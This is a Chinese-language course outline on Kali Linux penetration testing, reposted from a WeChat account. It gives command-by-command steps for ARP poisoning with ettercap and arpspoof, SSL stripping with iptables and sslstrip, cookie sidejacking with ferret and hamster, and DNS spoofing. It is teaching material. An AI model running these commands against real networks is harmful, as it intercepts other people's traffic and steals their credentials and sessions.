【PPT】Kali Linux Web 渗透测试-arp欺骗、嗅探、dns欺骗、session劫持

关于嗅探、arp欺骗、会话劫持

l 1. google

l 2. http://www.cnblogs.com/xuanhun/archive/2009/01/05/1369828.html

l http://www.cnblogs.com/xuanhun/archive/2009/04/22/1441274.html

会话劫持的实现手段

l 中间人攻击(arp欺骗,dns欺骗)

l 注射式攻击

Arp欺骗--ettercap

l 参数说明:http://www.91ri.org/4408.html

l 2.如果你是第一次进行中间人攻击操作,那么要对kali下的ettercap做点配置,配置文件是/etc/ettercap/etter.conf 首先你要将EC_UID 、EC_GID都变为0,然后找到LINUX分类下的IF YOU USE IPTABLES这一行,将注释(“#”号)去掉,打开转发。

3./etc/NetworkManager/NetworkManager.conf 修改

4.service network-manager restart

5.echo 1 >> /proc/sys/net/ipv4/ip_forward

6. ettercap -i wlan0 -Tq -M arp:remote /192.168.2.20/ /192.168.2.1/

Arp欺骗—arpspoof

l echo 1 >> /proc/sys/net/ipv4/ip_forward

l arpspoof -i eth0 -t 192.168.14.2 192.168.14.132

数据包捕获

l tcpdump

l wireshark

l drafnet等其他自动化工具

Ssl数据嗅探

l iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)

l iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(取消)

l sslstrip -p -l 10000 -w log.txt

session劫持-arp欺骗

l tcpdump -i eth0 -w qq.cap

l ferret -r qq.cap

l hamster

l http://hamster

l 选择目标

l 测试session

64位下ferret 安装

l dpkg --add-architecture i386

l apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

l sudo aptitude install ferret-sidejack:i386

session劫持-DNS欺骗

l 1. 使用 ettercap 进行arp欺骗

l 2.修改etter.dns 文件

/etc/ettercap/etter.dns

l 3.启用dns_spoof

课后练习

l 结合前面课程中的 set 工具集,我们在局域网中能做到天衣无缝(钓鱼和消息转发相结合)的钓鱼攻击吗?

l 局域网中的嗅探、钓鱼、session劫持、dns欺骗这一类的攻击的防御方式是什么?

原文发布于微信公众号 - 玄魂工作室(xuanhun521)

原文发表时间:2018-11-28

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

扫码关注云+社区

领取腾讯云代金券